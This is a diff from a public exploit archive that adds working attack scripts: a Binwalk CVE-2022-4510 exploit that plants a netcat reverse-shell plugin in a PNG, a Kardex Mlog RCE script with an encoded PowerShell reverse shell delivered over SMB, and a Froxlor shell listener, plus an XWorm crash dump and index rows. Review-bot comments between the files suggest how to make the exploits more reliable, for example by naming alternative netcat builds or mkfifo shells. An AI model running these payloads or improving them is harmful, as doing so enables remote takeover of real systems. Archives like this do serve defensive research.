=3D Thread(target=3Dconnection_handler, args=3D(port,)) + handler_thread.start() + print("[+] Triggering the payload ...") + req2 =3D request.get(admin_page_path) + + +def connection_handler(port): + print("[+] Listener started on port %s" % port) + t =3D telnetlib.Telnet() + s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", int(port))) + s.listen(1) + conn, addr =3D s.accept() + print("[+] Connection received from %s" % addr[0]) + t.sock =3D conn + print("[+] Heads up, incoming shell!!") + t.interact() + + + +if login(): + print("[+] Successfully Logged in!") + index_url =3D url + "/admin_index.php" + request.get(index_url) + if change_log_path(): + inject_template() + +else: + print("[-] Can't login") \ No newline at end of file 
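Review bot: The file is stored in MIME quoted-printable form — every `=` appears as `=3D`, trailing `=` soft breaks split statements such as `allow_redi=` / `rects=3DFalse`, and a bare `=20` sits inside the dict literal — so `python3 51263.py` fails with a SyntaxError on the first line; decode it before committing (`python3 -c 'import quopri,sys; sys.stdout.buffer.write(quopri.decodestring(sys.stdin.buffer.read()))' < 51263.py`). Once decoded, `multipart_data` lists `"logger_enabled"` twice and a dict literal keeps only the last value, so the `"0"` entry is silently dropped; if both fields are needed to mimic the checkbox's hidden-input pair, pass `files=` a list of tuples instead (`[("logger_enabled", (None, "0")), ("logger_enabled", (None, "1")), ...]`). The bare `except:` around the `Location` lookup hides why a failed injection returned no redirect; catch `KeyError` and print `req.status_code`. For operators: the exploit points Froxlor's log file at `templates/Froxlor/footer.html.twig` and stores the Twig payload as the `theme` setting, so log lines are appended to the target's footer template and the theme stays poisoned — the header should state how to restore both.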
diff --git a/exploits/python/remote/51249.py b/exploits/python/remote/51249.py new file mode 100755 index 000000000..22393de33 --- /dev/null +++ b/exploits/python/remote/51249.py 
@@ -0,0 +1,55 @@ +# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE) +# Exploit Author: Etienne Lacoche +# CVE-ID: CVE-2022-4510 +import os +import inspect +import argparse + +print("") +print("################################################") +print("------------------CVE-2022-4510----------------") +print("################################################") +print("--------Binwalk Remote Command Execution--------") +print("------Binwalk 2.1.2b through 2.3.2 included-----") +print("------------------------------------------------") +print("################################################") +print("----------Exploit by: Etienne Lacoche-----------") +print("---------Contact Twitter: @electr0sm0g----------") +print("------------------Discovered by:----------------") +print("---------Q. Kaiser, ONEKEY Research Lab---------") +print("---------Exploit tested on debian 11------------") +print("################################################") +print("") + +parser = argparse.ArgumentParser() +parser.add_argument("file", help="Path to input .png file",default=1) +parser.add_argument("ip", help="Ip to nc listener",default=1) +parser.add_argument("port", help="Port to nc listener",default=1) + +args = parser.parse_args() + +if args.file and args.ip and args.port: + header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e") + lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' 
os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n'] + + in_file = open(args.file, "rb") + data = in_file.read() + in_file.close() + + with open("/tmp/plugin", "w") as f: + for line in lines: + f.write(line) + + with open("/tmp/plugin", "rb") as f: + content = f.read() + + os.system("rm /tmp/plugin") + + with open("binwalk_exploit.png", "wb") as f: + f.write(data) + f.write(header_pfs) + f.write(content) + + print("") + print("You can now rename and share binwalk_exploit and start your local netcat listener.") + print("") \ No newline at end of file diff --git a/exploits/windows/dos/51265.txt b/exploits/windows/dos/51265.txt new file mode 100644 index 000000000..cc46d2364 --- /dev/null +++ b/exploits/windows/dos/51265.txt 
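Review bot: The plugin body is written to `/tmp/plugin`, read back, and deleted via `os.system("rm /tmp/plugin")`, which leaves a world-readable file holding the listener IP and port on the operator's machine for no reason and races with anything else using that fixed name; replace the three steps with `content = "".join(lines).encode()`. `header_pfs` is a fixed byte string whose embedded path decodes to `../../../.config/binwalk/plugins/binwalk.py`, and its trailing size/offset fields are constants while the plugin text varies with `args.ip`/`args.port`; a comment should document that layout and confirm the length field does not need to match `len(content)`. The payload relies on a netcat that accepts `-e /bin/bash`, which some `nc` builds (the OpenBSD variant) reject, so the header should name `nc.traditional`/`ncat` or use a `mkfifo` shell instead. The `default=1` on the three positional arguments and the `if args.file and args.ip and args.port:` guard are no-ops, since argparse already rejects a missing positional. `in_file = open(args.file, "rb")` should be a `with` block like the other file accesses.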
@@ -0,0 +1,224 @@ +#Exploit Author: XWorm Trojan 2.1 - Null Pointer Derefernce DoS +# Exploit Author: TOUHAMI KASBAOUI +# Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ +# Software Link: N/A# Version: 2.1# Tested on: Windows 10 +# CVE : N/A + +================================================================== +THE BUG : NULL pointer dereference -> DOS crash +================================================================== +The sophisticated XWorm Trojan is well exploited by EvilCoder, where they collect different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer deference vulnerability, which could lead to a denial of service for the server builder of the threat actor by getting his IP address and port of command and control. +================================================================== +WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES +================================================================== +(160.b98): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c +eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0         nv up ei pl zr na pe nc +cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246 +builder!XWorm.Client.isDisconnected+0xa9: +078f5a59 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000000=???????? 
+******************************************************************************* +*                                                                             * +*                        Exception Analysis                                   * +*                                                                             * +******************************************************************************* + +MethodDesc:   055a86b4 +Method Name:  XWorm.Client.isDisconnected() +Class:        09fe9634 +MethodTable:  055a86d8 +mdToken:      06000730 +Module:       01464044 +IsJitted:     yes +CodeAddr:     078f59b0 +Transparency: Critical +MethodDesc:   055a86b4 +Method Name:  XWorm.Client.isDisconnected() +Class:        09fe9634 +MethodTable:  055a86d8 +mdToken:      06000730 +Module:       01464044 +IsJitted:     yes +CodeAddr:     078f59b0 +Transparency: Critical +Failed to request MethodData, not in JIT code range + +KEY_VALUES_STRING: 1 + +    Key  : AV.Dereference +    Value: NullPtr + +    Key  : AV.Fault +    Value: Read + +    Key  : Analysis.CPU.mSec +    Value: 6406 + +    Key  : Analysis.DebugAnalysisManager +    Value: Create + +    Key  : Analysis.Elapsed.mSec +    Value: 12344 + +    Key  : Analysis.IO.Other.Mb +    Value: 152 + +    Key  : Analysis.IO.Read.Mb +    Value: 3 + +    Key  : Analysis.IO.Write.Mb +    Value: 181 + +    Key  : Analysis.Init.CPU.mSec +    Value: 48905 + +    Key  : Analysis.Init.Elapsed.mSec +    Value: 6346579 + +    Key  : Analysis.Memory.CommitPeak.Mb +    Value: 200 + +    Key  : CLR.BuiltBy +    Value: NET48REL1LAST_C + +    Key  : CLR.Engine +    Value: CLR + +    Key  : CLR.Version +    Value: 4.8.4515.0 + +    Key  : Timeline.OS.Boot.DeltaSec +    Value: 7496 + +    Key  : Timeline.Process.Start.DeltaSec +    Value: 6371 + +    Key  : WER.OS.Branch +    Value: vb_release + +    Key  : WER.OS.Timestamp +    Value: 2019-12-06T14:06:00Z + +    Key  : WER.OS.Version +    Value: 10.0.19041.1 + +    Key  : WER.Process.Version +   
 Value: 2.1.0.0 + + +NTGLOBALFLAG:  0 + +PROCESS_BAM_CURRENT_THROTTLED: 0 + +PROCESS_BAM_PREVIOUS_THROTTLED: 0 + +APPLICATION_VERIFIER_FLAGS:  0 + +EXCEPTION_RECORD:  (.exr -1) +ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9) +   ExceptionCode: c0000005 (Access violation) +  ExceptionFlags: 00000000 +NumberParameters: 2 +   Parameter[0]: 00000000 +   Parameter[1]: 00000000 +Attempt to read from address 00000000 + +FAULTING_THREAD:  00000b98 + +PROCESS_NAME:  builder.exe + +READ_ADDRESS:  00000000 + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE_STR:  c0000005 + +EXCEPTION_PARAMETER1:  00000000 + +EXCEPTION_PARAMETER2:  00000000 + +IP_ON_HEAP:  078f5a59 +The fault address in not in any loaded module, please check your build's rebase +log at \bin\build_logs\timebuild\ntrebase.log for module which may +contain the address if it were loaded. + +STACK_TEXT:   +0113e568 73140556     00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9 +0113e574 7314373a     0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34 +0113e5c8 7321f0d1     c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b +0113e608 7321f1d6     731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55 +0113e90c 7212853c     00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838 +0113e930 72114a9d     00000000 00000000 00000000 mscorlib_ni! +0113e94c 6e14bf55     00000000 00000000 00000000 mscorlib_ni! +0113e968 6e14be68     00000000 00000000 00000000 System_Windows_Forms_ni! +0113e990 72118604     00000000 00000000 00000000 System_Windows_Forms_ni! +0113e9f4 72118537     00000000 00000000 00000000 mscorlib_ni! +0113ea08 721184f4     00000000 00000000 00000000 mscorlib_ni! +0113ea24 6e14bdfa     00000000 00000000 00000000 mscorlib_ni! +0113ea40 6e14bb9a     00000000 00000000 00000000 System_Windows_Forms_ni! 
+0113ea80 6e13b07f     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eacc 6e144931     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ead8 6e1445f7     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eaec 6e13af53     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eaf4 6e13aee5     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eb08 6e13a820     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eb58 0146d08e     00000000 00000000 00000000 System_Windows_Forms_ni! +WARNING: Frame IP not in any known module. Following frames may be wrong. +0113eb8c 7650148b     000606f4 0000c250 00000000 0x146d08e +0113ebb8 764f844a     05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b +0113ec9c 764f61ba     05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a +0113ed10 764f5f80     0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a +0113ed1c 6e19e5ed     0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10 +0113ed58 6e14b44f     00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed +0113eddc 6e14b03d     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ee30 6e14ae93     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ee5c 014b2694     00000000 00000000 00000000 System_Windows_Forms_ni! 
+0113ee84 014b2211     00000000 00000000 00000000 0x14b2694 +0113eeac 014b1871     00000000 00000000 00000000 0x14b2211 +0113eef8 014b08b7     00000000 00000000 00000000 0x14b1871 +0113ef28 73140556     00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f +0113ef34 7314373a     0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34 +0113ef88 73149adb     00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b +0113eff0 732bff7b     0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a +0113f114 732c065a     0113f158 00000000 c8874096 clr!RunMain+0x1b3 +0113f380 732c0587     00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7 +0113f864 732c0708     c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef +0113f8bc 732c082e     c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c +0113f8fc 732bc235     c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc +0113f938 7398fa84     84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d +0113f970 73a1e81e     73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6 +0113f980 73a24338     73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e +0113f998 76b600f9     00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8 +0113f998 77997bbe     00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19 +0113f9f4 77997b8e     ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f +0113fa04 00000000     00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b + + +STACK_COMMAND:  ~0s ; .cxr ; kb + +SYMBOL_NAME:  builder!XWorm.Client.isDisconnected+a9 + +MODULE_NAME: builder + +IMAGE_NAME:  builder.exe + +FAILURE_BUCKET_ID:  NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected + +OS_VERSION:  10.0.19041.1 + +BUILDLAB_STR:  vb_release + +OSPLATFORM_TYPE:  x86 + +OSNAME:  Windows 10 + +IMAGE_VERSION:  2.1.0.0 + +FAILURE_ID_HASH:  {ab0d02c5-881b-c628-2858-a241c5c41b1f} + +Followup:     MachineOwner +--------- + +TS: Exploitable - Data from 
Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a) \ No newline at end of file diff --git a/exploits/windows/remote/51239.py b/exploits/windows/remote/51239.py new file mode 100755 index 000000000..035d40443 --- /dev/null +++ b/exploits/windows/remote/51239.py 
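Review bot: The closing verdict `Exploitable - Data from Faulting Address controls Code Flow` contradicts the rest of the analysis: the fault is `mov eax,dword ptr [ecx]` with `ecx=0` inside JIT-compiled managed code (`XWorm.Client.isDisconnected`, CLR 4.8.4515.0), which the runtime normally surfaces as a NullReferenceException — a crash of the builder, consistent with the title's DoS, not attacker-controlled code flow — so the entry should say the `!exploitable` heuristic is not trusted here. The reproduction is `AFTER SENDING 1000 'A' BYTES` with no indication of the transport, port or framing the builder's listener expects, so a one-line sender (target host/port and the exact bytes) is needed for anyone to reproduce it. The header block is mangled: the first line labels the title as `Exploit Author`, `Derefernce` should be `Dereference`, and `Software Link`, `Version` and `Tested on` are run together on one line. The summary's `denial of service for the server builder of the threat actor by getting his IP address and port` should state plainly that an analyst who recovers the C2 address and port from a sample can crash the operator's builder/C2 panel with it.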
@@ -0,0 +1,106 @@ +#!/usr/bin/env python3 + +# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) +# Date: 12/13/2022 +# Exploit Author: Patrick Hener +# Vendor Homepage: https://www.kardex.com/en/mlog-control-center +# Version: 5.7.12+0-a203c2a213-master +# Tested on: Windows Server 2016 +# CVE : CVE-2023-22855 +# Writeup: https://hesec.de/posts/CVE-2023-22855 +# +# You will need to run a netcat listener beforehand: ncat -lnvp +# +import requests, argparse, base64, os, threading +from impacket import smbserver + +def probe(target): + headers = { + "Accept-Encoding": "deflate" + } + res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers) + if "fonts" in res.text: + return True + else: + return False + +def gen_payload(lhost, lport): + rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' + rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE')) + payload = f"""<#@ template language="C#" #> +<#@ Import Namespace="System" #> +<#@ Import Namespace="System.Diagnostics" #> +<# +var proc1 = new ProcessStartInfo(); +string anyCommand; +anyCommand = "powershell -e {rev_shell_blob_b64.decode()}"; +proc1.UseShellExecute = true; +proc1.WorkingDirectory = @"C:\Windows\System32"; +proc1.FileName = @"C:\Windows\System32\cmd.exe"; +proc1.Verb = "runas"; +proc1.Arguments = "/c "+anyCommand; +Process.Start(proc1); +#>""" + + return payload + +def start_smb_server(lhost): + server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) + server.addShare("SHARE", 
os.getcwd(), '') + server.setSMB2Support(True) + server.setSMBChallenge('') + server.start() + +def trigger_vulnerability(target, lhost): + headers = { + "Accept-Encoding": "deflate" + } + + requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers) + +def main(): + # Well, args + parser = argparse.ArgumentParser() + parser.add_argument('-t', '--target', help='Target host url', required=True) + parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True) + parser.add_argument('-p', '--lport', help='Attacker listening port', required=True) + args = parser.parse_args() + + # Probe if target is vulnerable + print("[*] Probing target") + if probe(args.target): + print("[+] Target is alive and File Inclusion working") + else: + print("[-] Target is not alive or File Inclusion not working") + exit(-1) + + # Write payload to file + print("[*] Writing 'exploit.t4' payload to be included later on") + with open("exploit.t4", 'w') as template: + template.write(gen_payload(args.lhost, args.lport)) + + template.close() + + # Start smb server in background + print("[*] Starting SMB Server in the background") + smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,)) + smb_server_thread.start() + + # Rev Shell reminder + print("[!] At this point you should have spawned a rev shell listener") + print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'") + print("[?] Are you ready to trigger the vuln? Then press enter!") + input() # Wait for input then continue + + # Trigger vulnerability + print("[*] Now triggering the vulnerability") + trigger_vulnerability(args.target, args.lhost) + + # Exit + print("[+] Enjoy your shell. Bye!") + os._exit(1) + + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ded6d4760..8b4eac6da 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
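Review bot: `start_smb_server` exports the operator's entire current directory (`server.addShare("SHARE", os.getcwd(), '')`) with no authentication on port 445 for as long as the script runs, so everything in that directory — not just `exploit.t4` — is readable by the target and by anyone else who can reach the listener; write the template into a fresh `tempfile.mkdtemp()` directory (add `import tempfile`) and share only that. `os._exit(1)` on the success path returns a failure status to the shell and abandons the SMB thread without cleanup; make the thread `daemon=True` and exit with `0`. `template.close()` after the `with open(...)` block is redundant, and `probe` lets a connection error propagate as a traceback instead of the `[-] Target is not alive` message it prints for a bad response — wrap its `requests.get` in `try/except requests.RequestException`. A comment on `gen_payload` noting that the included `.t4` file is compiled and run as a C# T4 template (hence the `ProcessStartInfo` block) would help a reader; whether it runs with the service account's privileges is not shown here.
```python
def start_smb_server(lhost, share_dir):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("SHARE", share_dir, '')  # only the payload directory, never cwd
    # … unchanged: SMB2 support, empty challenge, server.start() …

# … in main(), replacing the exploit.t4 write and the thread start:
    share_dir = tempfile.mkdtemp(prefix="mlog-")
    with open(os.path.join(share_dir, "exploit.t4"), 'w') as template:
        template.write(gen_payload(args.lhost, args.lport))
    smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer",
                                         args=(args.lhost, share_dir), daemon=True)
```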
@@ -2892,6 +2892,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
+51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-05,0,CVE-2023-0744,,,,,
 7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,,
 2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,,
 10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583
@@ -3489,6 +3490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38720,exploits/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130399,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
 38719,exploits/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
 38718,exploits/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130403,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
+51243,exploits/hardware/remote/51243.txt,"D-Link DIR-846 - Remote Command Execution (RCE) vulnerability",2023-04-05,"Françoa Taffarel",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2022-46552,,,,,
 38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,,2013-04-19,2015-10-18,1,CVE-2013-3095;OSVDB-92550,,,,,https://www.securityfocus.com/bid/59312/info
 38717,exploits/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
 38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130405;OSVDB-130400,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
@@ -3511,6 +3513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,,
 9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,,
 7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,,
+51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,,
 50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
 50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
 50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
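Review bot: The description of row 51248 reads as a sentence (`Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure`) rather than the `Product Version - Vulnerability` form every neighbouring row uses, and it folds two vendors' products into one title, so it will sort and search under "Dell" only. `Dell EMC Networking PC5500 4.1.0.22 / Cisco Sx-SMB - Information Disclosure` keeps both products while dropping the "firmware versions" filler. Since two CVEs are listed, it is worth confirming that one PoC really covers both advisories rather than being two entries merged into one row.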
@@ -3857,6 +3860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38583,exploits/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,remote,hardware,,2013-06-12,2015-10-31,1,CVE-2013-3539;OSVDB-94226,,,,,https://www.securityfocus.com/bid/60529/info
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,,2020-10-01,2020-10-01,0,,,,,,
 44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,,2018-02-28,2018-04-25,0,,Console,,,,https://github.com/Cryptogenic/PS4-4.55-Kernel-Exploit/tree/bb0dfe821d94cb03491b0d4c5136cefd1624fc41
+51259,exploits/hardware/remote/51259.txt,"SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow",2023-04-05,LiquidWorm,remote,hardware,,2023-04-05,2023-04-05,0,,,,,,
 7055,exploits/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Configuration Download",2008-11-07,hkm,remote,hardware,,2008-11-06,,1,OSVDB-49870;CVE-2008-6916,,,,,
 33938,exploits/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",remote,hardware,,2010-02-04,2014-07-01,1,CVE-2010-0607;OSVDB-62211,,,,,https://www.securityfocus.com/bid/39928/info
 29666,exploits/hardware/remote/29666.rb,"Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)",2013-11-18,Metasploit,remote,hardware,80,2013-11-18,2013-11-18,1,CVE-2013-3623;OSVDB-99598,"Metasploit Framework (MSF)",,,,
@@ -5370,6 +5374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36436,exploits/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",webapps,java,,2015-03-19,2015-03-19,0,CVE-2015-0514;OSVDB-117348,,,,,
 36440,exploits/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",webapps,java,58080,2015-03-19,2015-03-19,0,CVE-2015-0516;OSVDB-117349,,,,,
 44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java,,2018-05-22,2018-05-22,0,CVE-2018-11339,,,,,
+51255,exploits/java/webapps/51255.txt,"ERPNext 12.29 - Cross-Site Scripting (XSS)",2023-04-05,"Patrick Dean Ramos / Nathu Nandwani / Junnair Manla",webapps,java,,2023-04-05,2023-04-05,0,CVE-2022-28598,,,,,
 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,,2020-07-09,2020-10-01,0,CVE-2019-5029,,,,,
 26987,exploits/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,webapps,java,,2005-12-27,2013-07-21,1,CVE-2005-4576;OSVDB-21936,,,,,https://www.securityfocus.com/bid/16073/info
 50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java,,2021-07-16,2021-10-29,0,CVE-2021-35464,,,,,
